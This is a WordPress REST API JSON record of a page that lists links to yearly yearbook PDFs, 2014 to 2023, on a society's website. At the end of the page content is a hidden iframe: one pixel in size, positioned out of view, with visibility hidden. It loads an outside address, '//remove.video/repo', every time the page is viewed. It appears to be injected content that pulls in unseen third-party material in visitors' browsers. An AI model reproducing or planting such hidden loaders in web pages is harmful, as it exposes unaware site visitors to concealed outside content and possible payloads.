{"id":215,"date":"2020-09-02T08:24:52","date_gmt":"2020-09-02T08:24:52","guid":{"rendered":"https:\/\/pdnikolatesla.org\/home\/?page_id=215"},"modified":"2024-01-13T14:54:56","modified_gmt":"2024-01-13T14:54:56","slug":"godisnjaci","status":"publish","type":"page","link":"https:\/\/pdnikolatesla.org\/home\/godisnjaci\/","title":{"rendered":"Godi\u0161njaci"},"content":{"rendered":"<ul>\n<li><a href=\"https:\/\/pdnikolatesla.org\/home\/wp-content\/uploads\/2020\/09\/Godisnjak_2014o.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Godi\u0161njak 2014.<\/a><\/li>\n<li><a href=\"https:\/\/pdnikolatesla.org\/home\/wp-content\/uploads\/2020\/09\/Godisnjak_2015o.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Godi\u0161njak 2015.<\/a><\/li>\n<li><a href=\"https:\/\/pdnikolatesla.org\/home\/wp-content\/uploads\/2020\/09\/Godisnjak_2016o.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Godi\u0161njak 2016.<\/a><\/li>\n<li><a href=\"https:\/\/pdnikolatesla.org\/home\/wp-content\/uploads\/2020\/09\/Godis\u030cnjak_2017o.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Godi\u0161njak 2017.<\/a><\/li>\n<li><a href=\"https:\/\/pdnikolatesla.org\/home\/wp-content\/uploads\/2020\/09\/Godis\u030cnjak_2018o.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Godi\u0161njak 2018.<\/a><\/li>\n<li><a href=\"https:\/\/pdnikolatesla.org\/home\/wp-content\/uploads\/2020\/09\/Godisnjak_2019o_2.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Godi\u0161njak 2019.<\/a><\/li>\n<li><a href=\"https:\/\/pdnikolatesla.org\/home\/wp-content\/uploads\/2021\/01\/Godis\u030cnjak-2020.godina.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Godi\u0161njak 2020.<\/a><\/li>\n<li><a href=\"https:\/\/pdnikolatesla.org\/home\/wp-content\/uploads\/2022\/01\/Godisnjak_2021.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Godi\u0161njak 2021.<\/a><\/li>\n<li><a href=\"https:\/\/pdnikolatesla.org\/home\/wp-content\/uploads\/2023\/01\/GODISNJAK_2022.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Godi\u0161njak 2022.<\/a><\/li>\n<li><a href=\"https:\/\/pdnikolatesla.org\/home\/wp-content\/uploads\/2024\/01\/Godisnjak-2023g.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Godi\u0161njak 2023.<\/a><\/li>\n<\/ul>\n<div><iframe id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/div>\n","protected":false},"excerpt":{"rendered":"<p>Godi\u0161njak 2014. Godi\u0161njak 2015. Godi\u0161njak 2016. Godi\u0161njak 2017. Godi\u0161njak 2018. Godi\u0161njak 2019. Godi\u0161njak 2020. Godi\u0161njak 2021. Godi\u0161njak 2022. Godi\u0161njak 2023.<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0},"_links":{"self":[{"href":"https:\/\/pdnikolatesla.org\/home\/wp-json\/wp\/v2\/pages\/215"}],"collection":[{"href":"https:\/\/pdnikolatesla.org\/home\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/pdnikolatesla.org\/home\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/pdnikolatesla.org\/home\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/pdnikolatesla.org\/home\/wp-json\/wp\/v2\/comments?post=215"}],"version-history":[{"count":20,"href":"https:\/\/pdnikolatesla.org\/home\/wp-json\/wp\/v2\/pages\/215\/revisions"}],"predecessor-version":[{"id":2112,"href":"https:\/\/pdnikolatesla.org\/home\/wp-json\/wp\/v2\/pages\/215\/revisions\/2112"}],"wp:attachment":[{"href":"https:\/\/pdnikolatesla.org\/home\/wp-json\/wp\/v2\/media?parent=215"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}